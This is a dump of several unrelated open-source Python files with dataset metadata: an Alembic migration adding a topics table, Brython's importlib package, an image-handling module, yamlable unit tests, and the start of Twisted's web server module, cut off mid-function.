2021-03-28T16:31:42.000Z
|
2022-03-21T00:18:30.000Z
|
migrations/versions/816ea3631582_add_topics.py
|
OpenASL/HowSignBot
|
bd9c5bc0edfd6fb50bdce7c7c1d84462e1e704c2
|
[
"MIT"
] | 1
|
2021-07-18T20:49:19.000Z
|
2021-07-18T20:49:19.000Z
|
"""add topics
Revision ID: 816ea3631582
Revises: 37a124b0099b
Create Date: 2021-03-13 14:20:10.044131
"""
from alembic import op
import sqlalchemy as sa
import bot
# revision identifiers, used by Alembic.
revision = "816ea3631582"
down_revision = "37a124b0099b"
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table(
"topics",
sa.Column("content", sa.Text(), nullable=False),
sa.Column("last_synced_at", bot.database.TIMESTAMP(timezone=True), nullable=True),
sa.PrimaryKeyConstraint("content"),
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table("topics")
# ### end Alembic commands ###
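# This revision would normally be applied through the standard Alembic CLI
# (`alembic upgrade head`); the programmatic call below is an equivalent
# sketch and assumes an alembic.ini is present in the working directory.
if __name__ == '__main__':
    from alembic.config import main as alembic_main
    alembic_main(argv=['upgrade', '816ea3631582'])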
| 23.085714
| 90
| 0.674505
| 96
| 808
| 5.604167
| 0.59375
| 0.050186
| 0.078067
| 0.085502
| 0.163569
| 0.163569
| 0.163569
| 0.163569
| 0
| 0
| 0
| 0.089094
| 0.194307
| 808
| 34
| 91
| 23.764706
| 0.737327
| 0.361386
| 0
| 0
| 0
| 0
| 0.133612
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| false
| 0
| 0.1875
| 0
| 0.3125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
86582bc3a8c357318983a8612ae2ca233e2c4562
| 3,137
|
py
|
Python
|
src/Lib/importlib/__init__.py
|
NUS-ALSET/ace-react-redux-brython
|
d009490263c5716a145d9691cd59bfcd5aff837a
|
[
"MIT"
] | 1
|
2021-08-05T12:45:39.000Z
|
2021-08-05T12:45:39.000Z
|
src/Lib/importlib/__init__.py
|
NUS-ALSET/ace-react-redux-brython
|
d009490263c5716a145d9691cd59bfcd5aff837a
|
[
"MIT"
] | null | null | null |
src/Lib/importlib/__init__.py
|
NUS-ALSET/ace-react-redux-brython
|
d009490263c5716a145d9691cd59bfcd5aff837a
|
[
"MIT"
] | 1
|
2019-09-05T08:20:07.000Z
|
2019-09-05T08:20:07.000Z
|
"""A pure Python implementation of import."""
__all__ = ['__import__', 'import_module', 'invalidate_caches']
# Bootstrap help #####################################################
# Until bootstrapping is complete, DO NOT import any modules that attempt
# to import importlib._bootstrap (directly or indirectly). Since this
# partially initialised package would be present in sys.modules, those
# modules would get an uninitialised copy of the source version, instead
# of a fully initialised version (either the frozen one or the one
# initialised below if the frozen one is not available).
import _imp # Just the builtin component, NOT the full Python module
import sys
from . import machinery
from . import _bootstrap
_bootstrap._setup(sys, _imp)
# To simplify imports in test code
_w_long = _bootstrap._w_long
_r_long = _bootstrap._r_long
# Fully bootstrapped at this point, import whatever you like, circular
# dependencies and startup overhead minimisation permitting :)
# Public API #########################################################
from ._bootstrap import __import__
def invalidate_caches():
"""Call the invalidate_caches() method on all meta path finders stored in
sys.meta_path (where implemented)."""
for finder in sys.meta_path:
if hasattr(finder, 'invalidate_caches'):
finder.invalidate_caches()
def find_loader(name, path=None):
"""Find the loader for the specified module.
First, sys.modules is checked to see if the module was already imported. If
so, then sys.modules[name].__loader__ is returned. If that happens to be
set to None, then ValueError is raised. If the module is not in
sys.modules, then sys.meta_path is searched for a suitable loader with the
value of 'path' given to the finders. None is returned if no loader could
be found.
Dotted names do not have their parent packages implicitly imported. You will
most likely need to explicitly import all parent packages in the proper
order for a submodule to get the correct loader.
"""
try:
loader = sys.modules[name].__loader__
if loader is None:
raise ValueError('{}.__loader__ is None'.format(name))
else:
return loader
except KeyError:
pass
return _bootstrap._find_module(name, path)
def import_module(name, package=None):
"""Import a module.
The 'package' argument is required when performing a relative import. It
specifies the package to use as the anchor point from which to resolve the
relative import to an absolute import.
"""
level = 0
if name.startswith('.'):
if not package:
raise TypeError("relative imports require the 'package' argument")
for character in name:
if character != '.':
break
level += 1
return _bootstrap._gcd_import(name[level:], package, level)
#need at least one import hook for importlib stuff to work.
from . import basehook
sys.meta_path.append(basehook.BaseHook())
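# A minimal demonstration of import_module() defined above: an absolute
# import, then a relative import anchored by the 'package' argument. This is
# a sketch only; the module names are illustrative and resolution here goes
# through this module's _bootstrap machinery.
def _demo_import_module():
    os_path = import_module('os.path')
    machinery_mod = import_module('.machinery', package='importlib')
    return os_path, machinery_mod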
| 36.057471
| 81
| 0.668792
| 409
| 3,137
| 4.98533
| 0.425428
| 0.039235
| 0.021579
| 0.012751
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.000832
| 0.233663
| 3,137
| 86
| 82
| 36.476744
| 0.847338
| 0.532037
| 0
| 0
| 0
| 0
| 0.108085
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.085714
| false
| 0.028571
| 0.285714
| 0
| 0.457143
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
86589b5f56644ed9997dc3b47f7f98c31f2ddd04
| 8,848
|
py
|
Python
|
lib/arlunio/arlunio/image.py
|
swyddfa/stylo
|
4d6b348ce5812dc5c2554bfd21a1550375aa05e1
|
[
"MIT"
] | null | null | null |
lib/arlunio/arlunio/image.py
|
swyddfa/stylo
|
4d6b348ce5812dc5c2554bfd21a1550375aa05e1
|
[
"MIT"
] | 13
|
2019-06-02T21:26:52.000Z
|
2019-08-04T15:54:41.000Z
|
lib/arlunio/arlunio/image.py
|
swyddfa/stylo
|
4d6b348ce5812dc5c2554bfd21a1550375aa05e1
|
[
"MIT"
] | 1
|
2019-07-08T17:00:56.000Z
|
2019-07-08T17:00:56.000Z
|
from __future__ import annotations
import base64
import io
import logging
import pathlib
from typing import Optional
# TODO: Remove these, as they should be contained in the numpy backend.
import numpy as np
import PIL.Image as PImage
import arlunio.ast as ast
import arlunio.color as color
import arlunio.mask as mask
import arlunio.math as math
logger = logging.getLogger(__name__)
class Image:
"""Our representation of an image, implemented as a wrapper around a standard
Pillow image."""
def __init__(self, img: PImage.Image):
self.img = img
"""The wrapped pillow image object."""
def __eq__(self, other):
if not isinstance(other, Image):
return False
a = np.asarray(self.img)
b = np.asarray(other.img)
return (a == b).all()
def __add__(self, other):
if isinstance(other, Image):
other = other.img
if not isinstance(other, PImage.Image):
raise TypeError("Addition is only supported between images.")
img = self.copy()
img.alpha_composite(other)
return img
@property
def __array_interface__(self):
# Ensure that our version of an image also plays nice with numpy.
return self.img.__array_interface__
def _repr_png_(self):
# Give nice previews in jupyter notebooks
return self.img._repr_png_()
@property
def size(self):
return self.img.size
def alpha_composite(self, im, *args, **kwargs):
"""Composites an image onto this image.
See :meth:`pillow:PIL.Image.Image.alpha_composite`
"""
if isinstance(im, Image):
im = im.img
self.img.alpha_composite(im, *args, **kwargs)
def copy(self):
"""Return a copy of the image.
See :meth:`pillow:PIL.Image.Image.copy`
"""
return Image(self.img.copy())
def paste(self, *args, **kwargs):
"""Paste another image into this image.
See :meth:`pillow:PIL.Image.Image.paste`
"""
self.img.paste(*args, **kwargs)
def save(self, *args, **kwargs):
"""Save the image with the given filename.
See :meth:`pillow:PIL.Image.Image.save`
"""
self.img.save(*args, **kwargs)
def thumbnail(self, *args, **kwargs):
"""Convert this image into a thumbail.
See :meth:`pillow:PIL.Image.Image.thumbnail`
"""
self.img.thumbnail(*args, **kwargs)
def new(color) -> Image:
"""Creates a new image with the given background color."""
return ast.Node.builtin(name="image", color=color)
def fromarray(*args, **kwargs):
"""Create an image from an array
See :func:`pillow:PIL.Image.fromarray`
"""
return Image(PImage.fromarray(*args, **kwargs))
def load(*args, **kwargs) -> Image:
"""Load an image from the given file.
See :func:`pillow:PIL.Image.open`
"""
return Image(PImage.open(*args, **kwargs))
def save(image: Image, filename: str, mkdirs: bool = False) -> None:
"""Save an image in PNG format.
:param filename: The filepath to save the image to.
:param mkdirs: If true, make any parent directories
"""
path = pathlib.Path(filename)
if not path.parent.exists() and mkdirs:
path.parent.mkdir(parents=True)
with open(filename, "wb") as f:
image.save(f)
def encode(image: Image) -> bytes:
"""Return the image encoded as a base64 string.
Parameters
----------
image:
The image to encode.
Example
-------
::
>>> import arlunio.image as image
>>> img = image.new((8, 8), color='red')
>>> image.encode(img)
b'iVBORw0KGgoAAAANSUhEUgAAAAgAAAAICAYAAADED76LAAAAFklEQVR4nGP8z8DwnwEPYMInOXwUAAASWwIOH0pJXQAAAABJRU5ErkJggg=='
"""
with io.BytesIO() as byte_stream:
image.save(byte_stream, "PNG")
image_bytes = byte_stream.getvalue()
return base64.b64encode(image_bytes)
def decode(bytestring: bytes) -> Image:
"""Decode the image represented by the given bytestring into an image object.
Parameters
----------
bytestring:
The bytestring to decode.
Example
-------
.. arlunio-image:: Decode Example
:include-code:
::
import arlunio.image as image
bytestring = b'iVBORw0KGgoAAAANSUhEUgAAAAgAAAAICAYAAADED76LAAAAFklEQVR4nGP8z8DwnwEPYMInOXwUAAASWwIOH0pJXQAAAABJRU5ErkJggg==' # noqa: E501
img = image.decode(bytestring)
"""
data = base64.b64decode(bytestring)
bytes_ = io.BytesIO(data)
return load(bytes_)  # load() above already wraps the result in Image
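def _demo_encode_roundtrip():
    # Round-trip sanity check for encode()/decode() above, as a sketch: PNG
    # encoding is lossless for RGBA data, so decoding the encoded image
    # should compare equal under Image.__eq__.
    arr = np.zeros((8, 8, 4), dtype=np.uint8)
    arr[..., 0] = 255  # red channel
    arr[..., 3] = 255  # opaque alpha
    img = fromarray(arr)
    assert decode(encode(img)) == img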
def colorramp(values, start: Optional[str] = None, stop: Optional[str] = None) -> Image:
"""Given a 2d array of values, produce an image gradient based on them.
.. arlunio-image:: Colorramp Demo
:align: right
::
import arlunio.image as image
import arlunio.math as math
import numpy as np
cartesian = math.Cartesian()
p = cartesian(width=256, height=256)
x, y = p[:, :, 0], p[:, :, 1]
values = np.sin(2*x*np.pi) * np.sin(2*y*np.pi)
img = image.colorramp(values)
First this function will scale the input array so that all values fall in the range
:math:`[0, 1]`. It will then produce an image with the same dimensions as the
original array. The color of each pixel will be chosen based on the corresponding
value of the scaled array.
- If the value is :math:`0` the color will be given by the :code:`start` parameter
- If the value is :math:`1` the color will be given by the :code:`stop` parameter
- Otherwise the color will be some mix between the two.
Parameters
----------
values:
The array of values used to decide on the color.
start:
The color to use for values near :math:`0` (default, :code:`black`)
stop:
The color to use for values near :math:`1` (default, :code:`white`)
Examples
--------
.. arlunio-image:: Colorramp Demo 2
:include-code:
::
import arlunio.image as image
import arlunio.math as math
import numpy as np
cartesian = math.Cartesian()
p = cartesian(width=256, height=256)
x = image.colorramp(p[:, :, 0], start="#0000", stop="#f007")
y = image.colorramp(p[:, :, 1], start="#0000", stop="#00f7")
img = x + y
"""
# Scale all the values so that they fall into the range [0, 1]
minx = np.min(values)
vs = np.array(values) - minx
vs = vs / np.max(vs)
if start is None:
start = "black"
if stop is None:
stop = "white"
start = color.getcolor(start, "RGBA")
stop = color.getcolor(stop, "RGBA")
funcs = [math.lerp(a, b) for a, b in zip(start, stop)]
channels = [np.floor(func(vs)) for func in funcs]
pixels = np.array(np.dstack(channels), dtype=np.uint8)
return fromarray(pixels)
def fill(
region,
foreground: Optional[str] = None,
background: Optional[str] = None,
image: Optional[Image] = None,
) -> Image:
"""Apply color to an image, as specified by a mask.
Parameters
----------
mask:
The mask that selects the region to be coloured
foreground:
A string representation of the color to use, this can be in any format that is
supported by the :mod:`pillow:PIL.ImageColor` module. If omitted this will
default to black.
background:
In the case where an existing image is not provided this parameter can be used
to set the background color of the generated image. This can be any string that
is accepted by the :mod:`pillow:PIL.ImageColor` module. If omitted this will
default to transparent
image:
The image to color in, if omitted a blank image will be used.
Example
--------
.. arlunio-image:: Fill Demo
:include-code:
::
import arlunio.image as image
import arlunio.shape as shape
circle = shape.Circle(x0=-0.5, y0=0.25, r=0.6)
img = image.fill(circle(width=512, height=256), foreground='red')
circle.x0, circle.y0 = 0, 0
img = image.fill(circle(width=512, height=256), foreground='#0f0', image=img)
circle.x0, circle.y0 = 0.5, -0.25
img = image.fill(circle(width=512, height=256), foreground='blue', image=img)
"""
foreground = "#000" if foreground is None else foreground
fill_color = color.getcolor(foreground, "RGBA")
if image is None:
background = "#0000" if background is None else background
image = new(color=background)
if not isinstance(region, ast.Node):
region = region()
return ast.Node.fill(image, region, fill_color)
| 26.570571
| 148
| 0.617315
| 1,154
| 8,848
| 4.690641
| 0.235702
| 0.02882
| 0.018105
| 0.014779
| 0.18474
| 0.155921
| 0.146314
| 0.133937
| 0.099575
| 0.063551
| 0
| 0.018996
| 0.268196
| 8,848
| 332
| 149
| 26.650602
| 0.816988
| 0.520231
| 0
| 0.020202
| 0
| 0
| 0.022859
| 0
| 0
| 0
| 0
| 0.003012
| 0
| 1
| 0.191919
| false
| 0
| 0.121212
| 0.030303
| 0.464646
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
865a20fd18fa17925d3611f9138e1d796448c4ce
| 9,001
|
py
|
Python
|
yamlable/tests/test_yamlable.py
|
smarie/python-yamlable
|
c726f5c56eea037968560ce83f9753bde1514991
|
[
"BSD-3-Clause"
] | 27
|
2018-07-12T17:09:41.000Z
|
2022-02-07T18:56:26.000Z
|
yamlable/tests/test_yamlable.py
|
smarie/python-yamlable
|
c726f5c56eea037968560ce83f9753bde1514991
|
[
"BSD-3-Clause"
] | 14
|
2018-07-10T08:09:21.000Z
|
2022-03-02T15:29:56.000Z
|
yamlable/tests/test_yamlable.py
|
smarie/python-yamlable
|
c726f5c56eea037968560ce83f9753bde1514991
|
[
"BSD-3-Clause"
] | 1
|
2020-09-22T16:13:51.000Z
|
2020-09-22T16:13:51.000Z
|
from copy import copy
try:
# Python 2 only:
from StringIO import StringIO
# create a variant that can serve as a context manager
class StringIO(StringIO):
def __enter__(self):
return self
def __exit__(self, exception_type, exception_value, traceback):
self.close()
except ImportError:
from io import StringIO
try: # python 3.5+
from typing import Dict, Any
from yamlable import Y
except ImportError:
pass
import pytest
from yaml import dump, load
from yamlable import YamlAble, yaml_info
def test_yamlable_incomplete_description():
""" Tests that if __yaml_tag_suffix__ is not provided a YamlAble subclass cannot be declared """
with pytest.raises(NotImplementedError) as err_info:
class Foo(YamlAble):
# __yaml_tag_suffix__ = 'foo'
def __to_yaml_dict__(self):
# type: (...) -> Dict[str, Any]
return copy(vars(self))
@classmethod
def __from_yaml_dict__(cls, # type: Type[Y]
dct, # type: Dict[str, Any]
yaml_tag # type: str
):
# type: (...) -> Y
return Foo(**dct)
# instantiate
f = Foo()
# dump
f.dumps_yaml()
assert "does not seem to have a non-None '__yaml_tag_suffix__' field" in str(err_info.value)
def test_yamlable():
""" Tests that YamlAble works correctly """
@yaml_info(yaml_tag_ns='yaml.tests')
class Foo(YamlAble):
# __yaml_tag_suffix__ = 'foo' not needed: we used @yaml_info
def __init__(self, a, b):
self.a = a
self.b = b
def __eq__(self, other):
return vars(self) == vars(other)
def __to_yaml_dict__(self):
# type: (...) -> Dict[str, Any]
return copy(vars(self))
@classmethod
def __from_yaml_dict__(cls, # type: Type[Y]
dct, # type: Dict[str, Any]
yaml_tag # type: str
):
# type: (...) -> Y
return Foo(**dct)
# instantiate
f = Foo(1, 'hello') # note:
# dump
y = f.dumps_yaml(default_flow_style=False)
assert y == """!yamlable/yaml.tests.Foo
a: 1
b: hello
"""
# dump io
class MemorizingStringIO(StringIO):
""" A StringIO object that memorizes its buffer when it is closed (as opposed to the standard StringIO) """
def close(self):
self.value = self.getvalue()
# super(StringIO, self).close() # this does not work with python 2 old-style classes (StringIO is one)
StringIO.close(self)
s = MemorizingStringIO()
f.dump_yaml(s, default_flow_style=False)
assert s.value == y
# dump pyyaml
assert dump(f, default_flow_style=False) == y
# load
assert f == Foo.loads_yaml(y)
# load io
assert f == Foo.load_yaml(StringIO(y))
# load pyyaml
assert f == load(y)
def test_yamlable_legacy_method_names():
""" Tests that YamlAbleMixIn works correctly """
global enc
global dec
enc, dec = False, False
@yaml_info(yaml_tag_ns='yaml.tests')
class FooLegacy(YamlAble):
# __yaml_tag_suffix__ = 'foo' not needed: we used @yaml_info
def __init__(self, a, b):
self.a = a
self.b = b
def __eq__(self, other):
return vars(self) == vars(other)
def to_yaml_dict(self):
# type: (...) -> Dict[str, Any]
global enc
enc = True
return copy(vars(self))
@classmethod
def from_yaml_dict(cls, # type: Type[Y]
dct, # type: Dict[str, Any]
yaml_tag # type: str
):
# type: (...) -> Y
global dec
dec = True
return FooLegacy(**dct)
# instantiate
f = FooLegacy(1, 'hello')
# dump
y = f.dumps_yaml(default_flow_style=False)
assert y == """!yamlable/yaml.tests.FooLegacy
a: 1
b: hello
"""
# dump io
class MemorizingStringIO(StringIO):
""" A StringIO object that memorizes its buffer when it is closed (as opposed to the standard StringIO) """
def close(self):
self.value = self.getvalue()
# super(StringIO, self).close() # this does not work with python 2 old-style classes (StringIO is one)
StringIO.close(self)
s = MemorizingStringIO()
f.dump_yaml(s, default_flow_style=False)
assert s.value == y
# dump pyyaml
assert dump(f, default_flow_style=False) == y
# load
assert f == FooLegacy.loads_yaml(y)
# load io
assert f == FooLegacy.load_yaml(StringIO(y))
# load pyyaml
assert f == load(y)
assert enc
assert dec
# TODO override so that tag is not supported, to check error message
def test_yamlable_not_supported():
@yaml_info(yaml_tag_ns='yaml.tests')
class Foo_Err(YamlAble):
# __yaml_tag_suffix__ = 'foo' not needed: we used @yaml_info
def __init__(self, a, b):
self.a = a
self.b = b
def __eq__(self, other):
return vars(self) == vars(other)
def __to_yaml_dict__(self):
# type: (...) -> Dict[str, Any]
return copy(vars(self))
@classmethod
def __from_yaml_dict__(cls, # type: Type[Y]
dct, # type: Dict[str, Any]
yaml_tag # type: str
):
# type: (...) -> Y
return Foo_Err(**dct)
@classmethod
def is_yaml_tag_supported(cls,
yaml_tag # type: str
):
# type: (...) -> bool
# ALWAYS return false
return False
with pytest.raises(TypeError) as err_info:
Foo_Err.loads_yaml("!yamlable/yaml.tests.Foo_Err {a: 1, b: hello}\n")
assert "No YamlAble subclass found able to decode object" in str(err_info.value)
def test_yamlable_default_impl():
""" tests that the default implementation works """
@yaml_info(yaml_tag_ns='yaml.tests')
class Foo_Default(YamlAble):
def __init__(self, a, b):
self.a = a
self.b = b
f = Foo_Default(1, 'hello')
s = """!yamlable/yaml.tests.Foo_Default
a: 1
b: hello
"""
assert dump(f, default_flow_style=False) == s
assert dump(load(dump(load(s))), default_flow_style=False) == s
def test_help_yaml_info():
@yaml_info("com.example.MyFoo")
class Foo(YamlAble):
pass
assert Foo.__yaml_tag_suffix__ == "com.example.MyFoo"
@yaml_info(yaml_tag_ns="com.example")
class Foo(YamlAble):
pass
assert Foo.__yaml_tag_suffix__ == "com.example.Foo"
assert Foo().dumps_yaml() == """!yamlable/com.example.Foo {}
"""
def test_abstract_parent_error():
"""This tests that we can define an abstract parent class with the YamlAble behaviour and inherit it"""
class AbstractFooE(YamlAble):
pass
class FooError(AbstractFooE):
"""
This class inherits from the parent without redefining a yaml tag
"""
def __init__(self, a, b):
self.a = a
self.b = b
def __eq__(self, other):
return vars(self) == vars(other)
# instantiate
e = FooError(1, 'hello')
# dump
with pytest.raises(NotImplementedError):
e.dumps_yaml()
def test_abstract_parent():
"""This tests that we can define an abstract parent class with the YamlAble behaviour and inherit it"""
class AbstractFooV(YamlAble):
pass
@yaml_info(yaml_tag_ns='yaml.tests')
class FooValid(AbstractFooV):
def __init__(self, a, b):
self.a = a
self.b = b
def __eq__(self, other):
return vars(self) == vars(other)
# instantiate
f = FooValid(1, 'hello') # note:
# dump
y = f.dumps_yaml(default_flow_style=False)
assert y == """!yamlable/yaml.tests.FooValid
a: 1
b: hello
"""
# dump io
class MemorizingStringIO(StringIO):
""" A StringIO object that memorizes its buffer when it is closed (as opposed to the standard StringIO) """
def close(self):
self.value = self.getvalue()
# super(StringIO, self).close() # this does not work with python 2 old-style classes (StringIO is one)
StringIO.close(self)
s = MemorizingStringIO()
f.dump_yaml(s, default_flow_style=False)
assert s.value == y
# dump pyyaml
assert dump(f, default_flow_style=False) == y
# load
assert f == FooValid.loads_yaml(y)
# load io
assert f == FooValid.load_yaml(StringIO(y))
# load pyyaml
assert f == load(y)
| 26.551622
| 115
| 0.56627
| 1,112
| 9,001
| 4.364209
| 0.146583
| 0.030291
| 0.036266
| 0.047599
| 0.653822
| 0.641665
| 0.641665
| 0.614259
| 0.588296
| 0.567278
| 0
| 0.002646
| 0.328297
| 9,001
| 338
| 116
| 26.630178
| 0.800033
| 0.232196
| 0
| 0.639175
| 0
| 0
| 0.072947
| 0.027909
| 0
| 0
| 0
| 0.002959
| 0.139175
| 1
| 0.170103
| false
| 0.025773
| 0.051546
| 0.06701
| 0.376289
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
865a984bc7cd45c042cff94434fa063630359314
| 29,537
|
py
|
Python
|
src/twisted/web/server.py
|
vmario/twisted
|
34f3d8f8c6f51772eaed92a89257ea011e9a818d
|
[
"Unlicense",
"MIT"
] | null | null | null |
src/twisted/web/server.py
|
vmario/twisted
|
34f3d8f8c6f51772eaed92a89257ea011e9a818d
|
[
"Unlicense",
"MIT"
] | null | null | null |
src/twisted/web/server.py
|
vmario/twisted
|
34f3d8f8c6f51772eaed92a89257ea011e9a818d
|
[
"Unlicense",
"MIT"
] | null | null | null |
# -*- test-case-name: twisted.web.test.test_web -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
This is a web server which integrates with the twisted.internet infrastructure.
@var NOT_DONE_YET: A token value which L{twisted.web.resource.IResource.render}
implementations can return to indicate that the application will later call
C{.write} and C{.finish} to complete the request, and that the HTTP
connection should be left open.
@type NOT_DONE_YET: Opaque; do not depend on any particular type for this
value.
"""
import copy
import os
import re
from html import escape
from typing import List, Optional
from urllib.parse import quote as _quote
import zlib
from binascii import hexlify
from zope.interface import implementer
from twisted.python.compat import networkString, nativeString
from twisted.spread.pb import Copyable, ViewPoint
from twisted.internet import address, interfaces
from twisted.internet.error import AlreadyCalled, AlreadyCancelled
from twisted.web import iweb, http, util
from twisted.web.http import unquote
from twisted.python import reflect, failure, components
from twisted import copyright
from twisted.web import resource
from twisted.web.error import UnsupportedMethod
from incremental import Version
from twisted.python.deprecate import deprecatedModuleAttribute
from twisted.logger import Logger
NOT_DONE_YET = 1
__all__ = [
"supportedMethods",
"Request",
"Session",
"Site",
"version",
"NOT_DONE_YET",
"GzipEncoderFactory",
]
# backwards compatibility
deprecatedModuleAttribute(
Version("Twisted", 12, 1, 0),
"Please use twisted.web.http.datetimeToString instead",
"twisted.web.server",
"date_time_string",
)
deprecatedModuleAttribute(
Version("Twisted", 12, 1, 0),
"Please use twisted.web.http.stringToDatetime instead",
"twisted.web.server",
"string_date_time",
)
date_time_string = http.datetimeToString
string_date_time = http.stringToDatetime
# Support for other methods may be implemented on a per-resource basis.
supportedMethods = (b"GET", b"HEAD", b"POST")
def quote(string, *args, **kwargs):
return _quote(string.decode("charmap"), *args, **kwargs).encode("charmap")
def _addressToTuple(addr):
if isinstance(addr, address.IPv4Address):
return ("INET", addr.host, addr.port)
elif isinstance(addr, address.UNIXAddress):
return ("UNIX", addr.name)
else:
return tuple(addr)
@implementer(iweb.IRequest)
class Request(Copyable, http.Request, components.Componentized):
"""
An HTTP request.
@ivar defaultContentType: A L{bytes} giving the default I{Content-Type}
value to send in responses if no other value is set. L{None} disables
the default.
@ivar _insecureSession: The L{Session} object representing state that will
be transmitted over plain-text HTTP.
@ivar _secureSession: The L{Session} object representing the state that
will be transmitted only over HTTPS.
"""
defaultContentType = b"text/html"
site = None
appRootURL = None
prepath: Optional[List[bytes]] = None
postpath: Optional[List[bytes]] = None
__pychecker__ = "unusednames=issuer"
_inFakeHead = False
_encoder = None
_log = Logger()
def __init__(self, *args, **kw):
http.Request.__init__(self, *args, **kw)
components.Componentized.__init__(self)
def getStateToCopyFor(self, issuer):
x = self.__dict__.copy()
del x["transport"]
# XXX refactor this attribute out; it's from protocol
# del x['server']
del x["channel"]
del x["content"]
del x["site"]
self.content.seek(0, 0)
x["content_data"] = self.content.read()
x["remote"] = ViewPoint(issuer, self)
# Address objects aren't jellyable
x["host"] = _addressToTuple(x["host"])
x["client"] = _addressToTuple(x["client"])
# Header objects also aren't jellyable.
x["requestHeaders"] = list(x["requestHeaders"].getAllRawHeaders())
return x
# HTML generation helpers
def sibLink(self, name):
"""
Return the text that links to a sibling of the requested resource.
@param name: The sibling resource
@type name: C{bytes}
@return: A relative URL.
@rtype: C{bytes}
"""
if self.postpath:
return (len(self.postpath) * b"../") + name
else:
return name
def childLink(self, name):
"""
Return the text that links to a child of the requested resource.
@param name: The child resource
@type name: C{bytes}
@return: A relative URL.
@rtype: C{bytes}
"""
lpp = len(self.postpath)
if lpp > 1:
return ((lpp - 1) * b"../") + name
elif lpp == 1:
return name
else: # lpp == 0
if len(self.prepath) and self.prepath[-1]:
return self.prepath[-1] + b"/" + name
else:
return name
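# Worked example of the relative-link arithmetic above, without needing a
# Request: with two remaining path segments a sibling link climbs both of
# them, while a child link climbs one fewer. The segment names are made up.
#
#   postpath = [b'a', b'b']
#   (len(postpath) * b"../") + b"sib" == b"../../sib"          # sibLink
#   ((len(postpath) - 1) * b"../") + b"child" == b"../child"   # childLink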
def gotLength(self, length):
"""
Called when HTTP channel got length of content in this request.
This method is not intended for users.
@param length: The length of the request body, as indicated by the
request headers. L{None} if the request headers do not indicate a
length.
"""
try:
getContentFile = self.channel.site.getContentFile
except AttributeError:
http.Request.gotLength(self, length)
else:
self.content = getContentFile(length)
def process(self):
"""
Process a request.
Find the addressed resource in this request's L{Site},
and call L{self.render()<Request.render()>} with it.
@see: L{Site.getResourceFor()}
"""
# get site from channel
self.site = self.channel.site
# set various default headers
self.setHeader(b"server", version)
self.setHeader(b"date", http.datetimeToString())
# Resource Identification
self.prepath = []
self.postpath = list(map(unquote, self.path[1:].split(b"/")))
# Short-circuit for requests whose path is '*'.
if self.path == b"*":
self._handleStar()
return
try:
resrc = self.site.getResourceFor(self)
if resource._IEncodingResource.providedBy(resrc):
encoder = resrc.getEncoder(self)
if encoder is not None:
self._encoder = encoder
self.render(resrc)
except BaseException:
self.processingFailed(failure.Failure())
def write(self, data):
"""
Write data to the transport (if not responding to a HEAD request).
@param data: A string to write to the response.
@type data: L{bytes}
"""
if not self.startedWriting:
# Before doing the first write, check to see if a default
# Content-Type header should be supplied. We omit it on
# NOT_MODIFIED and NO_CONTENT responses. We also omit it if there
# is a Content-Length header set to 0, as empty bodies don't need
# a content-type.
needsCT = self.code not in (http.NOT_MODIFIED, http.NO_CONTENT)
contentType = self.responseHeaders.getRawHeaders(b"content-type")
contentLength = self.responseHeaders.getRawHeaders(b"content-length")
contentLengthZero = contentLength and (contentLength[0] == b"0")
if (
needsCT
and contentType is None
and self.defaultContentType is not None
and not contentLengthZero
):
self.responseHeaders.setRawHeaders(
b"content-type", [self.defaultContentType]
)
# Only let the write happen if we're not generating a HEAD response by
# faking out the request method. Note, if we are doing that,
# startedWriting will never be true, and the above logic may run
# multiple times. It will only actually change the responseHeaders
# once though, so it's still okay.
if not self._inFakeHead:
if self._encoder:
data = self._encoder.encode(data)
http.Request.write(self, data)
def finish(self):
"""
Override C{http.Request.finish} for possible encoding.
"""
if self._encoder:
data = self._encoder.finish()
if data:
http.Request.write(self, data)
return http.Request.finish(self)
def render(self, resrc):
"""
Ask a resource to render itself.
If the resource does not support the requested method,
generate a C{NOT IMPLEMENTED} or C{NOT ALLOWED} response.
@param resrc: The resource to render.
@type resrc: L{twisted.web.resource.IResource}
@see: L{IResource.render()<twisted.web.resource.IResource.render()>}
"""
try:
body = resrc.render(self)
except UnsupportedMethod as e:
allowedMethods = e.allowedMethods
if (self.method == b"HEAD") and (b"GET" in allowedMethods):
# We must support HEAD (RFC 2616, 5.1.1). If the
# resource doesn't, fake it by giving the resource
# a 'GET' request and then return only the headers,
# not the body.
self._log.info(
"Using GET to fake a HEAD request for {resrc}", resrc=resrc
)
self.method = b"GET"
self._inFakeHead = True
body = resrc.render(self)
if body is NOT_DONE_YET:
self._log.info(
"Tried to fake a HEAD request for {resrc}, but "
"it got away from me.",
resrc=resrc,
)
# Oh well, I guess we won't include the content length.
else:
self.setHeader(b"content-length", b"%d" % (len(body),))
self._inFakeHead = False
self.method = b"HEAD"
self.write(b"")
self.finish()
return
if self.method in (supportedMethods):
